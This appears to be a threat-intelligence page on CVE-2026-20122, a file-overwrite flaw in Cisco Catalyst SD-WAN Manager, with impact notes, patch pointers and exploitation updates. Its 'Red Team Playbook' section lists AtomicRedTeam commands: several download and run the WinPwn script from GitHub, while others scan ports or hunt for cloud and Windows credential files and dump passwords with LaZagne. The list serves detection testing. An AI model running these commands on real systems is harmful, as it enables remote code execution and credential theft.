CVE-2026-20122
Overview
This vulnerability is a file overwrite flaw caused by improper file handling in the API interface of Cisco Catalyst SD-WAN Manager. Specifically, the API allows authenticated users with read-only credentials to upload files without sufficient validation or restrictions, enabling arbitrary file overwrite on the local filesystem. The affected component is the API subsystem responsible for processing file uploads within the SD-WAN Manager product.
Vulnerability Description
A vulnerability in the API of Cisco Catalyst SD-WAN Manager could allow an authenticated, remote attacker to overwrite arbitrary files on the local file system. To exploit this vulnerability, the attacker must have valid read-only credentials with API access on the affected system. This vulnerability is due to improper file handling on the API interface of an affected system. An attacker could exploit this vulnerability by uploading a malicious file on the local file system. A successful exploit could allow the attacker to overwrite arbitrary files on the affected system and gain vmanage user privileges.
Impact
An attacker with valid read-only API credentials can overwrite arbitrary files on the system, potentially escalating privileges to the vmanage user. This enables unauthorized modification of system files, which can lead to compromise of system integrity and unauthorized access to sensitive data or administrative functions. The prerequisite is possession of valid read-only API credentials, which may be obtained through credential theft or insider access. The business impact includes potential lateral movement within the network and disruption of SD-WAN management operations.
Solution
Cisco has released a security advisory addressing this issue for Cisco Catalyst SD-WAN Manager, specifically noting version 20.12.6 among affected releases. Administrators should apply the updates provided in the Cisco Security Advisory available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v. The advisory includes detailed patch instructions and recommended mitigations. No alternative workarounds are specified beyond applying the vendor-supplied fix.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A vulnerability in the API of Cisco Catalyst SD-WAN Manager presents a significant risk due to improper file handling, allowing an authenticated remote attacker to overwrite arbitrary files on the local file system. This flaw arises from inadequate validation and sanitization of file uploads, which can lead to unauthorized file manipulation. Specifically, the vulnerability permits an attacker with valid read-only credentials and API access to exploit the system by uploading malicious files. The consequences of such an action could be severe, as it may enable the attacker to overwrite critical files and potentially escalate privileges to that of a vManage user.
The primary attack vector involves leveraging authenticated API access to upload a crafted file that the system fails to properly handle. Once the attacker successfully uploads the malicious file, they can overwrite essential system files, which could lead to unauthorized access or modification of system configurations. For instance, an attacker could replace configuration files or scripts that control the operation of the SD-WAN Manager, leading to service disruptions or unauthorized changes in network policies. Additionally, the ability to escalate privileges to vManage user status could allow the attacker to further manipulate the system, potentially leading to a complete compromise of the SD-WAN infrastructure.
In terms of real-world impact, the business risks associated with this vulnerability are substantial. Organizations relying on Cisco Catalyst SD-WAN Manager for their network management could face significant operational disruptions if an attacker successfully exploits this vulnerability. The unauthorized modification of configurations could lead to network outages, data breaches, or even the introduction of malicious configurations that could compromise the integrity and confidentiality of sensitive data. Furthermore, the financial implications of such incidents can be severe, including costs related to incident response, system recovery, and potential regulatory fines if data protection laws are violated.
To detect and mitigate this vulnerability, organizations should implement several strategies. Regularly updating the affected systems to the latest versions provided by Cisco is crucial, as these updates often include patches for known vulnerabilities. Additionally, organizations should enforce strict access controls, ensuring that only necessary personnel have API access and that their permissions are limited to the minimum required for their roles. Monitoring API activity for unusual patterns, such as unexpected file uploads or modifications, can also help in early detection of potential exploitation attempts. Employing a robust file integrity monitoring solution can further enhance security by alerting administrators to unauthorized changes in critical files.
In conclusion, the vulnerability in the API of Cisco Catalyst SD-WAN Manager underscores the importance of secure file handling practices and stringent access controls in modern network management solutions. The potential for an attacker to exploit this flaw and gain elevated privileges poses a serious threat to organizational security and operational integrity. By adopting proactive detection and mitigation strategies, organizations can significantly reduce their risk exposure and safeguard their network environments against such vulnerabilities.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2026-20122, coinciding with its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog. This formal recognition by CISA elevates the vulnerability’s profile and signals increased scrutiny from both defenders and adversaries. Our telemetry indicates a rapidly rising trend in exploitation attempts, reflected in a significant uptick in the Exploit Prediction Scoring System (EPSS) score and a newly assigned CVSS rating of 5.4, which collectively suggest growing attacker interest and potential for impact. Although no new exploit techniques have been publicly disclosed, the sharp increase in detection activity implies that threat actors may be actively probing affected Cisco Catalyst SD-WAN Manager deployments, leveraging valid read-only API credentials to attempt unauthorized file overwrites. This development heightens the urgency for defenders to reassess exposure and monitoring strategies, as the vulnerability’s exploitation could facilitate unauthorized modifications to critical system files, undermining network integrity. Consequently, the risk level for organizations using the affected product has shifted from low to medium, reflecting a more tangible threat environment driven by emerging adversary activity and official government attention.
Update 2 — May 16, 2026
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2026-20122, with telemetry indicating a significant surge in attempts to leverage this vulnerability via authenticated API access. Concurrently, the Exploit Prediction Scoring System (EPSS) score for this vulnerability has risen substantially, reflecting increased likelihood of exploitation in the wild. This upward trend underscores a growing adversary interest and operational focus on targeting Cisco Catalyst SD-WAN Manager deployments, particularly exploiting the improper file handling flaw to overwrite critical system files. For defenders, this shift signals an elevated threat posture that necessitates heightened vigilance in monitoring API access patterns and anomalous file operations. The risk assessment for affected environments has accordingly been adjusted upward, reflecting a transition from a theoretical concern to a more immediate and actionable threat, driven by both increased exploitation attempts and formal recognition in government vulnerability catalogs.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | All |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:*:*:*:*:*:*:*:*
|
|
|
Cisco | Catalyst Sd-Wan Manager | 20.12.6 |
cpe:2.3:a:cisco:catalyst_sd-wan_manager:20.12.6:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
9 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-107 | Cross Site Tracing |
35%
|
Medium | Very High | |
| CAPEC-234 | Hijacking a privileged process |
33%
|
— | Medium |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-20122 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v |
| cisa.gov |
NVD API
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-20122 |